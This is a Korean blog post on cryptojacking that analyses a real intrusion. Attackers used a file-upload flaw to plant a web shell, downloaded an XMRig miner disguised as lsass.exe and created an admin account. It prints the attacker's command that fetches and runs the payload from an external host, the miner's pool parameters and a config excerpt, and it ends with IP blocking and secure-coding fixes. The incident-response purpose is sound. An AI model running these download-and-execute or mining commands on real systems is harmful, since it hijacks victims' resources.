크립토 재킹 / cryptojacking 이란?
크립토재킹(Cryptojacking)은 피해자의 PC 및 모바일 기기 감염을 통해 암호화폐를 채굴 하기 위한 공격 가장 많이 알려진 악성코드로는 암호화폐 모네로 채굴에 사용되는 악성코드 암호화폐 채굴 악성코드에 감염되면 감염 서버나 PC의 CPU 자원을 99% 까지 사용
비정상적인 루트나 불법으로 채굴코드를 설치하여 감염 device의 리소스 자원을 사용하여 해커는 불법으로 이득을 취할수 있으며,
피해자 입장에서는 과다한 리소스 사용으로 예를들자면 전기 요금이 상승하여 금전적인 피해가 발생할수 있으며, 서비스 운영적인 측면에서도 속도가 느려진다 거나 이외 다양한 불이익이 발생할수 있다.
요즘은 고도화 되어 CPU 사용량만으로는 감염 사실을 알아차리기 힘듬
공격 벡터
대표적인 채굴코드 감염 루트는 악성링크를 삽입하여 악성 이메일 대량 자동발송으로 감염 웹페이지 내 악성 스크립트를 삽입하여 웹페이지 접속 유도를 하여 감염 다양한 공격벡터가 존재하지만 실제 사례를 토대로 포스팅 합니다.
침해 사고 피해 사례
발견된 보안홀 (공격벡터)
웹서비스내 이미지 업로드 페이지의 파일 업로드 취약점을 악용한 채굴코드(악성코드) 설치 감염 악성 웹쉘을 업로드 후 원격에서 OS 권한 탈취 및 외부로부터 채굴코드(악성코드) 다운로드 후 설치 채굴 코드 설치 및 서버 자원을 사용하여 가상화폐 채굴등 비정상 행위를 진행한것으로 확인
상세 분석
APT 보안 장비 탐지 로그 일부
탐지명 MINER – TCP (Request)
March 15th 2021, 16:52:57.819 DDI 1.24x.xx 1x.xx1.252.86 443 MINER - TCP (Request) March 15th 2021, 16:36:55.084 DDI 1.24x.xx 1x.xx1.252.86 443 MINER - TCP (Request) March 15th 2021, 16:31:50.083 DDI 1.24x.xx 1x.xx1.252.86 443 MINER - TCP (Request) March 15th 2021, 16:26:47.858 DDI 1.24x.xx 1x.xx1.252.86 443 MINER - TCP (Request) March 15th 2021, 16:16:20.092 DDI 1.24x.xx 1x.xx1.252.86 443 MINER - TCP (Request) March 15th 2021, 16:14:07.859 DDI 1.24x.xx 1x.xx1.252.86 443 MINER - TCP (Request) March 15th 2021, 16:06:45.084 DDI 59.2x.xx 0x.xx.252.86 443 MINER - TCP (Request) March 15th 2021, 16:06:05.079 DDI 1.24x.xx 1x.xx1.252.86 443 MINER - TCP (Request) March 15th 2021, 16:04:25.084 DDI 1.24x.xx 6x.xx.199.18 443 MINER - TCP (Request)
통신 패킷 분석 내용 일부
해외 xx.xx.39.1×8 로 부터 채굴 코드 다운로드 및 monero coin 관련 통신 패킷
c:\Users\Public\Libraries\get.exe -O c:\Users\Public\Libraries\lsass.exe http://2xx.xx5.x9.1x8/6722/lsass.exe c:\Users\Public\Libraries\get.exe -O c:\Users\Public\Libraries\lsass.exe http://2xx.xx5.x9.1x8/6722/lsass.exe c:\Users\Public\Libraries\lsass.exe --donate-level 1 -o x0.oxxxxx.com:53 -u feng -o xx.xxxxzo.com:443 -u feng --coin monero -k --tls -t 4
암호화폐 전송 패킷 -> doxxxxx.sxxl.xmrig.com
{“id”:1,”jsonrpc”:”2.0″,”method”:”login”,”params”:{“login”:”3876d8b9b4cb4d7e6b9864209fxxxxxxxxxxxxxx87″,”pass”:”x”,”agent”:”XMRig/6.7.2 (Windows NT 6.3; Win64; x64) libuv/1.40.0 msvc/2019″,”url”:”stratum+ssl://doxxxxx.sxxl.xmrig.com:443″,”algo”:[“rx/0″,”cn/2″,”cn/r”,”cn/fast”,”cn/half”,”cn/xao”,”cn/rto”,”cn/rwz”,”cn/zls”,”cn/double”,”cn-lite/1″,”cn-heavy/0″,”cn-heavy/tube”,”cn-heavy/xhv”,”cn-pico”,”cn-pico/tlo”,”cn/ccx”,”cn/1″,”rx/wow”,”rx/arq”,”rx/sfx”,”rx/keva”,”xxxxgon2/chukwa”,”xxxgon2/chukwav2″,”xxxon2/wrkz”,”asxxxxxxwt”]}}
피해 서버 분석
특정 프로세스(config.exe, lsass.exe 이외 다수) -> 해외 모네로 monero coin 채굴사이트 암호화폐 전송
c:\Users\Public\Libraries\lsass.exe 악성코드
c:\windows\Fonts\config.exe 채굴코드
config.json 채굴 악성코드 일부
"cpu": { "enabled": true, "huge-pages": true, "huge-pages-jit": false, "hw-aes": null, "priority": null, "memory-pool": false, "yield": true, "asm": true, "argon2-impl": null, "astrobwt-max-size": 550, "astrobwt-avx2": false, "argon2": [0, 1, 2, 3], "astrobwt": [0, 1, 2, 3], "cn": [ [1, 0], [1, 1], [1, 2], [1, 3] ], "cn-heavy": [ [1, 0], [1, 1] ], "cn-lite": [ [1, 0], [1, 1], [1, 2], [1, 3] ], "cn-pico": [ [2, 0], [2, 1], [2, 2], [2, 3] ], "cn/gpu": [0, 2], "rx": [0, 2], "rx/wow": [0, 2], "cn/0": false, "cn-lite/0": false, "rx/arq": "rx/wow", "rx/keva": "rx/wow" },
windows OS 계정 생성 흔적
administrator group / user name “a” 계정 생성
탐지 및 대응방안
1) 침해 사고와 관련된 IP주소 차단 및 지속 모니터링
2) 이미지 업로드 페이지 / 파일 업로드 취약점 시큐어 코딩 보완조치 공격 벡터 차단